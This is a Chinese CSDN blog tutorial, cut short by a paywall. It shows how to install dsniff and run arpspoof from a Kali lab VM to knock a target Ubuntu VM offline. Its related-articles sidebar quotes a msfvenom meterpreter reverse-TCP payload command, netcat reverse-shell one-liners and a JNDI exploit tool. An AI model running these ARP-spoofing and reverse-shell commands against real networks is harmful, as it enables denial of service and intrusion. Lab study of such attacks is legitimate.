Kali linux aprspoof arp断网、欺骗攻击

最新推荐文章于 2024-06-04 17:41:06 发布
最新推荐文章于 2024-06-04 17:41:06 发布
阅读量1.2k 收藏 13
点赞数 2
分类专栏: 网络安全 文章标签: kali arpspoof 断网 Ubuntu 安装
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhang35/article/details/105677273
版权

环境

攻击机:Kali Linux 2020.1 172.16.252.129
靶机:Ubuntu 16.04 172.16.252.138
网关:172.16.252.2

安装arpspoof

Kali Linux 2020.1 VM版本身没有arpspoof工具,需要自己安装。arpspoof是dsniff的一个组件,直接安装dsniff:

sudo apt-get install dsniff

断网攻击

命令格式:

arpspoof -i 网卡 -t 目标IP 网关

该条指令意思是:告诉目标IP,网关的MAC地址是我。污染了目标IP的arp缓存,属于单向欺骗。

(可用route -n查看网关)

本环境中:

sudo arpspoof -i eth0 -t 172.16.252.138 172.16.252.2

靶机上ping 百度原本畅通,在被攻击后就无法连通了,后面的ICMP包全丢:


                

                
                
        

        

    




        

            

                    
                      最低0.47元/天 解锁文章
                        
                    
            

        

    

      

        

            

              
                
                  zhang35
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    2
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    13
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                  1
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
使用Msfvenom生成Ubuntu 64位木马(反向连接、正向连接)

				
			

			

				

					zhang35的博客
				

				

					04-20
					
					1万+
					
				

			

		

		

			
				
环境
攻击机:Kali Linux 2020.1 172.16.252.129
靶机:Ubuntu 16.04 172.16.252.138
生成木马
使用kali自带的Msfvenom工具生成木马。
查看有哪些linux下的载荷:
msfvenom -l payloads | grep linux

针对Ubuntu 64位靶机,使用linux/x64/meterpreter/reverse_t...

			
		

	



                

              
                



	

		

			

				
					
Ubuntu 16.04配置UFW防火墙

				
			

			

				

					zhang35的博客
				

				

					04-27
					
					2493
					
				

			

		

		

			
				
配置默认策略
sudo vim /etc/default/ufw

有如下默认规则:
IPV6=yes

这个开启时,写一条规则将自动变成两条:IPv4的和IPv6的;如果用不上的话可以将其改为no。
配置进入规则
默认情况下开启ufw,会禁止一切从外到内的连接,可以直接建立白名单规则。
也可以手动配置是否禁用一切进入:
sudo ufw default allow incoming
sudo u...

			
		

	



                


  
              

                


	

		

			

				
					
arpspoof断网

				
			

			

				

					qq_73277309的博客
				

				

					03-13
					
					607
					
				

			

		

		

			
				
攻击机:kali        IP : 192.168.136.131        网关:192.168.136.255。目标机:win7        IP : 192.168.136.133        网关:192.168.136.2。测试攻击机是否可以ping通目标机:ping 192.168.136.133。测试攻击机是否联网:ping www.baidu.com。测试目标机是否联网:ping www.baidu.com。问题:知道对方的ip,如何获得对方的网关。

			
		

	





	

		

			

				
					
ensp加kali实现arp欺骗攻击

				
			

			

				

					04-21
				

			

		

		

			
				
本文将深入探讨如何使用Kali Linux这一专业安全操作系统,配合ENSPI(Ethernet Network Simulation Platform,以太网网络模拟平台)来实现ARP欺骗攻击,并了解这种攻击可能导致的后果。  首先,我们需要理解ARP的...

			
		

	



		

			
		



	

		

			

				
					
Kali ARP断网攻击

				
			

			

				

					m0_58709145的博客
				

				

					06-04
					
					897
					
				

			

		

		

			
				
如果网关有主机B的ARP表项,网关会广播ARP请求,目标IP地址为主机B的IP地址,当网关从收到的响应报文中获得主机B的MAC地址后,就可以将报文发给主机B;ARP请求报文中的发送端IP地址和发送端MAC地址为主机A的IP地址和MAC地址,目标IP地址和目标MAC地址为主机B的IP地址和全0的MAC地址。主机B比较自己的IP地址和ARP请求报文中的目标IP地址,当两者相同时进行如下处理:将ARP请求报文中的发送端(即主机A)的IP地址和MAC地址存入自己的ARP表中。停止命令即可恢复   ctrl C。

			
		

	





	

		

			

				
					
使用kali linux实现arp欺骗

				
			

			

				

					04-17
				

			

		

		

			
				
小黑子技术和防御方法

			
		

	





	

		

			

				
					
Kali局域网嗅探和断网拦截

				
			

			

				

					08-31
				

			

		

		

			
				
下面我们将介绍如何使用 Kali Linux 实现局域网嗅探和断网拦截。  一、获取本机 IP 和网卡信息  在开始嗅探和拦截之前,我们需要先获取本机的 IP 和网卡信息。我们可以使用 `ifconfig` 命令来实现这一步骤。打开终端...

			
		

	





	

		

			

				
					
Kali Linux WiFi攻击与防护.rar

				
			

			

				

					11-03
				

			

		

		

			
				
我们攻击WIFI的第一个思路就是从保密性出发,我们希望从无线系统中获取用户的明文数据。首先,我们知道WIFI的的认证加密主要有以下四种方式:OPEN(无加密)、WEP(RC4)、WPA(TKIP)、WPA2(CCMP)。

			
		

	





	

		

			

				
					
Kali Linux渗透测试高级篇.rar

				
			

			

				

					09-12
				

			

		

		

			
				
Kali Linux 是一款专门用于IT安全评估的Linux操作系统。目前作为被欢迎的Linux操作系统广泛用于安全评估项目中,其中提供600+安全工具,帮助安全人员更好的完成项目。课程主要内容:学习Kali Linux安全测试使用工具...

			
		

	





	

		

			

				
					
Meterpreter session 2 closed.  Reason: Died 问题解决方法

					
热门推荐

				
			

			

				

					zhang35的博客
				

				

					04-22
					
					1万+
					
				

			

		

		

			
				
问题描述
用msf生成Ubuntu 16.04的反向连接木马:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=172.16.252.129 LPORT=1234 -f elf > shell.elf

开启监听:
msfconsole
use exploit/multi/handler
set payload windows/mete...

			
		

	





	

		

			

				
					
OSSEC添加Agent 错误Cannot unlink /queue/rids/sender解决方法

				
			

			

				

					zhang35的博客
				

				

					04-13
					
					2476
					
				

			

		

		

			
				
服务器端配置
添加Agent
执行:sudo /var/ossec/bin/manage_agents
执行默认的A选项:
****************************************
* OSSEC HIDS v3.6.0 Agent manager.     *
* The following options are available: *
***************...

			
		

	





	

		

			

				
					
OSSEC Agent和Server无法连接的常用检查流程

				
			

			

				

					zhang35的博客
				

				

					04-14
					
					2042
					
				

			

		

		

			
				
若Agent和Server无法连接,下面是常用检查流程。
检查网络是否连通
ping serverIP

重启server和agent
sudo /var/ossec/bin/ossec-control restart

检查rids文件夹
OSSEC依赖rids文件夹实现同步。
server端/var/ossec/queue/rids 文件夹下应该保存有每个agent ID号同名的文件。
假如有...

			
		

	





	

		

			

				
					
Ubuntu16.04安装OSSEC详细步骤

				
			

			

				

					zhang35的博客
				

				

					04-12
					
					1737
					
				

			

		

		

			
				
参考官网文档:OSSEC Installation
安装环境
Ubuntu 16.04 VMware虚拟机
安装依赖包

安装build-essential来编译安装OSSEC,为了使用系统的pcre2库,安装libpcre2-dev包:

apt-get install build-essential make zlib1g-dev libpcre2-dev


为了支持数据库,需要安装mysq...

			
		

	





	

		

			

				
					
OSSEC文件监控和命令监控(附文件监控测试用例)

				
			

			

				

					zhang35的博客
				

				

					04-14
					
					1483
					
				

			

		

		

			
				
OSSEC的log文件监控(LIDS,log-based intrusion detection),能检测攻击、误用、系统错误等。
agent端不产生alerts,全部由server集中分析处理。
具体参考官方文档:Log monitoring/analysis
文件监控
ossec-logcollector进程负责监控log文件和事件,有新的日志消息时就转发到server。
配置文件为ossec...

			
		

	





	

		

			

				
					
NC不用-e建立TCP/UDP 反弹连接shell

				
			

			

				

					zhang35的博客
				

				

					04-26
					
					1347
					
				

			

		

		

			
				
主机1监听端口,主机2发起连接。
TCP shell
主机1:
nc -nvlp 4444

主机2:
/bin/sh 0</tmp/backpipe | nc 主机1的IP 4444 1>/tmp/backpipe

UDP shell
攻击机:
nc -nuvlp 4444

靶机:
mkfifo fifo
nc -u 主机1的IP 4444 < fifo |
{ 
  ec...

			
		

	





	

		

			

				
					
JNDIExploit使用

				
			

			

				

					07-29
				

			

		

		

			
				
一款用于 JNDI注入利用的工具,大量参考/引用了 Rogue JNDI项目的代码,支持直接植入内存shell,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。

使用说明
使用 java -jar JNDIExploit.jar -h查看参数说明,其中 --ip参数为必选参数

Usage: java -jar JNDIExploit.jar [options]
  Options:
  * -i, --ip       Local ip address
    -l, --ldapPort Ldap bind port (default: 1389)
    -p, --httpPort Http bind port (default: 8080)
    -u, --usage    Show usage (default: false)
    -h, --help     Show this help
Dockerfile
git clone https://github.com/feihong-cs/JNDIExploit.git
cd ./JN

			
		

	





	

		

			

				
					
基于MATLAB的人体行为识别.zip

					
最新发布

				
			

			

				

					07-29
				

			

		

		

			
				
在MATLAB中,可以使用机器学习和计算机视觉技术来实现人体行为识别。下面是一个基本的人体行为识别过程的程序:

1. 数据收集和准备:
   - 收集包含不同人体行为的视频数据。
   - 使用视频处理技术提取每个视频中的人体姿势和关键点信息。

2. 特征提取:
   - 使用计算机视觉技术,如OpenPose或者其他姿势估计算法,提取每个视频中的人体关键点位置。
   - 根据关键点位置计算特征向量,例如关节角度、运动速度等。

3. 数据标记和标签:
   - 根据人体行为类型,对收集的数据进行标记和分类,例如步行、跑步、打球等。
   - 为每个人体行为类型分配一个标签。

4. 训练模型:
   - 使用机器学习算法,如支持向量机(SVM)、决策树、深度神经网络等,对标记和分类的数据进行训练。
   - 使用训练数据和标签训练模型,以学习不同行为类型之间的关系。

5. 测试和识别:
   - 使用训练好的模型对新的测试数据进行预测和识别。
   - 输入测试数据的特征向量到训练好的模型中,根据模型的输出来确定人体行为类型。

6. 评估和改进:
   - 根据测试结果评估

			
		

	





	

		

			

				
					
【创新未发表】Matlab实现蝗虫优化算法GOA-Kmean-Transformer-BiLSTM组合状态识别算法研究.rar

				
			

			

				

					07-29
				

			

		

		

			
				
1.版本:matlab2014/2019a/2021a

 2.附赠案例数据可直接运行matlab程序。 

3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 

4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 

5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 

替换数据可以直接使用,注释清楚,适合新手

			
		

	





	

		

			

				
					
kali linuxarp欺骗 断网

				
			

			

				

					06-06
				

			

		

		

			
				
### 回答1:
Kali Linux可以使用ARP欺骗技术来进行网络攻击,这种攻击方式可以让攻击者伪装成网络中的其他设备,从而获取目标设备的网络流量和敏感信息。同时,Kali Linux也可以使用断网技术来阻止目标设备的网络连接,从而达到攻击的目的。这些技术需要谨慎使用,避免对他人造成不必要的损失。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		
评论 1

	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值